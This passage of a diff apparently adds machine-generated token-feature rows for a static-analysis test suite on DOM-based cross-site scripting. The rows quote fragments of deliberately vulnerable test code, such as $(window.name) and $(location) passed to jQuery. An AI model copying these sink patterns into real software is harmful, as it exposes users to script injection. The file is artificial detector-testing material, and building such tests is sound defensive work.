element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:19:263:21 | 'a' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:263:24:263:26 | 'b' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:9 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:9 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:9 | $ | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:9 | $ | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:9 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | $(window.name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | $(window.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | $(window.name) | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | $(window.name) | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | $(window.name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | exceptional return of $(window.name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | exceptional return of $(window.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | exceptional return of $(window.name) | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | exceptional return of $(window.name) | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:264:9:264:22 | exceptional return of $(window.name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:264:11:264:16 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:264:11:264:16 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:264:11:264:16 | window | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:264:11:264:16 | window | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:264:11:264:16 | window | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17083,6 +118613,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | enclosingFunctionBody | name a b $ window name $ name | | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | enclosingFunctionName | windowNameAssigned | | autogenerated/Xss/DomBasedXss/tst.js:264:11:264:21 | window.name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:264:18:264:21 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:264:18:264:21 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:264:18:264:21 | name | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:264:18:264:21 | name | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:264:18:264:21 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:9 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:9 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:9 | $ | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:9 | $ | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:9 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | $(name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | $(name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | $(name) | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | $(name) | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | $(name) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | exceptional return of $(name) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | exceptional return of $(name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | exceptional return of $(name) | enclosingFunctionBody | name a b $ window name $ name | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | exceptional return of $(name) | enclosingFunctionName | windowNameAssigned | +| autogenerated/Xss/DomBasedXss/tst.js:265:9:265:15 | exceptional return of $(name) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17090,6 +118640,47 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | enclosingFunctionBody | name a b $ window name $ name | | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | enclosingFunctionName | windowNameAssigned | | autogenerated/Xss/DomBasedXss/tst.js:265:11:265:14 | name | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:269:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:269:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:269:0 | this | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:269:0 | this | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:269:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | 'arguments' object of function jqueryLocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | 'arguments' object of function jqueryLocation | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | 'arguments' object of function jqueryLocation | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | 'arguments' object of function jqueryLocation | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | 'arguments' object of function jqueryLocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | exceptional return of function jqueryLocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | exceptional return of function jqueryLocation | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | exceptional return of function jqueryLocation | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | exceptional return of function jqueryLocation | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | exceptional return of function jqueryLocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | functio ... OT OK\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | functio ... OT OK\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | return of function jqueryLocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | return of function jqueryLocation | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | return of function jqueryLocation | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | return of function jqueryLocation | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:269:1:281:1 | return of function jqueryLocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:269:10:269:23 | jqueryLocation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:269:10:269:23 | jqueryLocation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:269:10:269:23 | jqueryLocation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:5 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:5 | $ | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:5 | $ | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:5 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | $(location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | $(location) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | $(location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | $(location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | $(location) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | exceptional return of $(location) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | exceptional return of $(location) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | exceptional return of $(location) | enclosingFunctionBody | $ location $ window location $ document location loc1 location loc2 window location loc3 document location $ loc1 $ loc2 $ loc3 $ body append location | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | exceptional return of $(location) | enclosingFunctionName | jqueryLocation | +| autogenerated/Xss/DomBasedXss/tst.js:270:5:270:15 | exceptional return of $(location) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:270:7:270:14 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 